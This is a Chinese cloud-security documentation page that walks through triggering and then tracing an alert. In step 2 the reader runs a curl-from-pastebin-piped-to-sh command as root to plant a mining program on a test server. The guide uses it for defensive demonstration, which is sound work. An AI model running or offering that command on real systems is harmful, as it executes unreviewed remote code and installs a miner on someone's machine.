网络攻击发生后,云安全中心攻击分析能力可以全面展示您资产受到的攻击并对攻击行为进行分析,帮助您构建更精细化的纵深防护体系。本文介绍在攻击发生后,使用攻击溯源能力的最佳实践。

前提条件

操作步骤

  1. 使用root用户通过SSH方式登录测试服务器。
  2. 执行curl https://pastebin.com/raw/ffbqpKTn | sh命令给该服务器植入挖矿程序。
    该命令执行完成后,等待3分钟再执行接下来的操作。
  3. 登录云安全中心控制台
  4. 在左侧导航栏,选择威胁检测 > 安全告警处理
  5. 安全告警处理页面,查看挖矿程序告警。查看挖矿告警
  6. 单击挖矿程序的告警名称,进入告警详情页。
  7. 单击溯源页签,查看告警溯源信息。查看溯源信息
    说明 执行步骤2中的挖矿命令10分钟后,才能看到告警的溯源信息。关于攻击溯源的更多信息,请参见攻击溯源